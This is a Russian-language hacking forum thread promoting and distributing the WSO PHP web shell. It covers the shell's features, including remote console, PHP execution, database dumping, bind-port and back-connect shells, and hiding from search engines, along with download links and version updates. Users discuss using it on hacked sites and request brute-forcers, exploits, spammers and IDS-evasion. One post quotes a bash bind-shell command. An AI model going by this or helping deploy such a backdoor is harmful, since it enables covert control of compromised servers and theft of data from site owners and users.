WSO - веб-шелл
 

Описание:

• Авторизация
• Информация о сервере
• Файловый менеджер (Копирование, переименование, перемещение, удаление, чмод, тач, создание файлов и папок)
• Просмотр, hexview, редактирование, давнлоад, аплоад файлов
• Работа с zip архивами (упаковка, распаковка)
• Консоль
• SQL менеджер (MySql, PostgreSql)
• Выполнение PHP кода
• Работа со строками + поиск хеша в онлайн базах
• Биндпорт и бек-коннект (Perl)
• Поиск текста в файлах
• *nix/Windows

Из фишек

• Антипоисковик (проверяется User-Agent, если поисковик, тогда возвращается 404 ошибка)
• Консолька запоминает введенные команды. (перемещаться по ним можно с помощью стрелок вверх, вниз при фокусе на поле для ввода)
• Можно использовать AJAX
• Малый вес (24.32 KB)
• Выбор кодировки, в которой работает шелл.

Данная утилита предоставляет веб-интерфейс для удаленной работы c операционной системой и ее службами/демонами.
Использование данного продукта в незаконных целях грозит уголовной ответственностью.

Скачать: http://narod.ru/disk/18331224000/wso2.4.zip.html
Архив содержит последнюю версию шелла и небольшую тулзу WSOmanager - для работы с шеллами.

Обновление:

• Пофиксил баги
• Мелкие исправления:
  - clear теперь очищает консоль, не делая запрос на сервер
  - При изменении кодировки, соединение с мускулом не "сбрасывается".
• Добавлены
  - Bind port to /bin/bash
  - изменение даты модификации файла
• Упаковал. Теперь вес (16 кб)

Первый пост обновил.

UPD:
еще несколько фиксов.
Спасибо: b3

Обновление:

• Уменьшен размер кода, генерируемого файловым менеджером
• Добавлен новый сервис для расшифровки хеша
• В файловом менеджере можно применять сортировки к столбцам
• В SQL менеджере новый вывод таблиц (более наглядный, подсчет записей в каждой таблице)
• Записи с длинным полями отображаются в компактном виде
• Сделал возможность дампа бд. Можно выбирать конкретные таблицы.
• В меню выделяется раздел, в котором находишься
• Все формы в разделе Tools теперь нормальные (отправляются по enter'у)
• Код местами переписан, + исправлены мелкие баги.

Отредактировал первый пост.

Отличная вещь. дизайн бы правда сменить :)

Скоро займусь 2й версией. По планам много будет изменено, дизайн в том числе.

главное не дизайн, а функционал.

п.с. зачётный шелл!

Небольшие фиксы:
- нормальная работа при safe-mode
- после соединения с mysql сервером, кодировка устанавливалась с помощью функции mysql_set_charset. Почитал мануал повнимательней: PHP 5 >= 5.2.3. Пофиксил.

Опаньки)Ща испробуем.Будет ещё обновляться что-нить ?):)

1)Или мне кажется,или r99 быстрее)
2) Я за смену дизайна:)(как у эрки) ).
3) Хорошо б замутить брут ssh+Брут по словарю))))))))
4)Бэкконекта чет не вижу,а вот биндя есть:).


ЗЫ:Лови плюськи )

Обновляемый проект - хороший проект))).Буду(лично я - да) ждать с ультрамеганетерпением:)

Да, сейчас пишу вторую версию (переписываю с нуля). Будет заметно больше функционала, обновленный диз и нормальная кроссплатформенность.
не совсем понял, что ты имел в виду (c99 или r57). Все зависит от много, в том числе, какой именно функционал шелла используется. Но по скорости они не должны заметно отличаться.
по словарю будет, ssh - посмотрим.
да, его там нет, сам его написать не мог, а чужой код вставлять не хотелось.

Можно же сдвинуть вправо на 12 бит

Пасип,что ответил.Да,я имел ввиду r57:)(Видно,Веле не здоровилось сегодня:) )

Зачетный шел. Перешел с с99 madnet edition на этот. Из минусов - нету бекдора и дизайн мне больше нравился у c99 madnet. Автору респект

Если серв виндузяццкий, то ссылки у меня не совсем корректно работали. У себя на локалхосте тестил.

gromoza, дык в первом посте написано, что шелл только под *nix.
wso2 сейчас уже нормально работает на обоих платформах. Когда напишу весь функционал, который задумал - выложу релиз.

oRb респект! крутой шелл получился! ;) жду обновки!
Хочеться еще консольку под виндувс (а то команды не пашут на виндовсе под твоим шеллом)

Перезалейте плиз куданить в другое место

Вот и 2я версия. Вся инфа в первом посте. Надеюсь все будут довольны :)

http://www.axifile.com/?3060315
http://depositfiles.com/files/2lvijsi1n
http://ifolder.ru/11818910
http://zalil.ru/27486709
качаем наздоровье

Дизайн никакой,тот был лучше

Респект! Вещь действительно хорошая.
Отмечю пару вещей которых на мой взгляд не хватает другим шеллам.

1) Авторизация по паролю, поскольку не используется метод Basic, шелл будет работать с паролем на гораздо большем количестве взломаных сайтов чем с Basic ибо она не поддерживается на каждом втором сайте (я про php basic а не htaccess).

2) Удобная работа с базой данных, именно этот шелл смог залезть в одну БД в которую другие по каким-то причинам не смогли получить доступ.
Но тут небольшая проблемма, - скачиваемый дамп не сжимается, жаль.

3) Очень красивый (опять таки на мой взгляд) дизайн, замечательное сочитание цветов, и не напрягает глаз.

А вот что из больших минусов, так это нет отображения листинга + как в с99 чтобы щёлкаешь по директории и попадаешь в неё. В этом направлении с99 удобнее.

ЗЫ: главное не запаковывай его как с99, а то опять будут проблеммы с запуском на многих хостах.

Просто если php прикручен как cgi-обработчик, то Basic авторизация не пашет. Поэтому я и отказался от нее.
Постараюсь реализовать в следующей версии
Как нет? О_О Нажми на "Files" (2я ссыль в менюшке).
Ага, упакован он по обычному, надо будет придумать что-нибудь другое.

ps: по поводу диза. Цвет можно поменять самому. В начале скрипта есть переменная $color.

Шелл прикольненький....

А на cold fusion подобное кто-нить видел?

Отличный шелл...
Хотелось бы, чтобы ты добавил в SQL количество записей для каждой таблички...

Ня))) Орбик постаралсо.Всё ещё надеюсь на SSH и другие специфические вещички,которых нет у с99(опять ня).Подумаю,что можно ещё добавить:)

оО: А если флудер/спамер мыл туда присобачить,как в NFM ?)))(по списку и одному).Кому-то это покажется бесполезным,но по мне так наоборот - куча прог в одном скрипте,которые мона заюзать на хосте... Веля не параноик!)

А чо за Exception processing Message ? Далее идут адреса...

2Велемир
Может сразу туда добавить спамер однокласников и добавления видео с ютуба или получения прямых ссылок с файлообменика?

Я лишь высказал своё мнение.Твой ответ меня не интересует,а одноклассники - тем более

Предлагаю добавить следующее:

1.Показ IP/DNS сервера.Это нужно для того,чтобы по сотню раз не юзать команды.
2.Поставить эксплойты,как в NFS и GNY.
3. RFI/LFI FINDER.Видел такую реализацию и на производительности это никак не сказалось.
4.Сканер портов,дабы не бегать за сканерами.Реально напрягает.Всё это уже реализовано во многих шеллах.Лично я бы юзал их,если б не их минусы и дизайн.
5. PHP Safe-Mode Bypass.Читалка/писалки хорошо было бы видеть в последующих релизах.

Это всё.Спасибо за внимание.

Велемир,
1. IP итак показывается. DNS? А зачем? оО
2. вот поэтому они и весят по пол метра, а мой всего 20 килобайт.
3. Опять же лишний вес. И эта вещь мало кому нужна.
4. Возможно.
5. итак есть. Вот только вспомнить сплойтов под safe-mode для записи в файл, я что-то не могу.

ps: готовится версия 2.1

Почему не может получить доступ к tty? шелл биндится, но команды не работают.

shellz[21h], у меня нету достаточной информации, чтобы ответить на Ваш вопрос.
Могу задать лишь встречные вопросы:
1. как обстоят дела с биндпортами на других шеллах?
2. Что за система?
3. Если есть возможность скинуть линк на шелл в пм?

Я тестирую на локалхосте, как выяснилось дело не в биндшелле который в вашем шелле, так как пробывал забиндить порт другим средствами, аналогичная проблема. На других хостах не тестил, но думается все работает.

Если биндить шелл, чтоб он запускал bash [ system('/bin/bash -i'); ] интерактивном режиме, то все работает.

Новая версия: 2.1
Обновил первый пост.
Кратко об изменениях:

• Фиксы багов
• В SQL-менеджере пишется число записей в таблице
• SQL дамп и файлы качаются упакованными
• Добавлена возможность постраничного просмотра содержимого таблиц
• SQL-менеджер теперь работает и с PostgreSql
• Добавлена возможность выбора как отправить запрос (AJAX или без него)
• Улучшена работа шелла в инклюдах.
• Небольшой конфиг в начале шелла

В планах на будущее: реализовать идею Digimortal'а об рандомных именах параметров и шифровании данных при передаче для обхода IDS

Не знаю как получаешь список файлов - на NetWare с safe_mode on не видет папок и файлов кроме себя хотя тот же r57 все замечательно видет,та даже вот так все выводится print_r(scandir("./")) а в твоем шелле почему то нет.

PaCo, спасибо за тест. Парочка встречных вопросов:
1. Если можешь, выложи ls -la той папки
2. Настройки пхп. Интересуют больше safe_mode_gid и disable_functions
3. а. Что вернет is_dir($dir), где $dir - папка, которую не отображает шелл.
3. б. Аналагочино с is_file()

1)Не могу выложить ибо safe_mode, привилигии не повышал и честно не сталкивался с этим на NET WARE, вот что выводит r57:
2) phpinfo()
3) is_dir():
var_dump(is_dir("../")); // bool(false)
var_dump(is_dir("./")); // bool(false)
var_dump(is_dir("sys:/apache2/htdocs/site_name/admin_dir/main_dir")); // bool(false)

4)
is_file:
var_dump(is_file("sys:/apache2/htdocs/site_name/admin_dir/main_dir/some_file.php")); // bool(false) то есть старый файл не видет по все видимости, stat этого файла также выводит ошибку, хотя readfile() выводит содежимое этого файла, равно как и file_get_contents().

var_dump(is_file("sys:/apache2/htdocs/site_name/admin_dir/main_dir/my_shell_name.php")); // bool(true)
а новый файл определяеться, самое удивительное что все файлы доступны на запись и etc, по всей видимости это какие очень дикие настройки php(серверная API CGI кстати), шелл от madnet также ничего кроме себя не видет ибо наверника также опредляет файл по is_file(), только r57 тупа сканит дир и вылаживает содержимое без проверки на is_file() файлов поэтому они видны.

Вроде понял.
Бага похоже заключается в том, что scandir, не смотря на сейфмод возвращает все содержимое диры. А функции по типу is_dir, is_file, file_size и т.д. не могу получить инфу о файле из-за сейфмода. Т.е. ты с этими файлами ничего сделать не сможешь.
Возможно такой результат scandir - это бага сеймода той версии пхп (5.0.5).

ну не только scandir возврашает содержимое дириктории, но и
поэтому наврятли это трабла в нем,

опровергая, в файлы я могу присвободно записывать(разуметься во все что в веб дире), имхо проблема скорее либо в серверной API либо в не совсем стандартном поведении функций is_dir, is_file, file_size на Net Ware в safe_mod, потому как все функции по сохранению в файл работают отлично.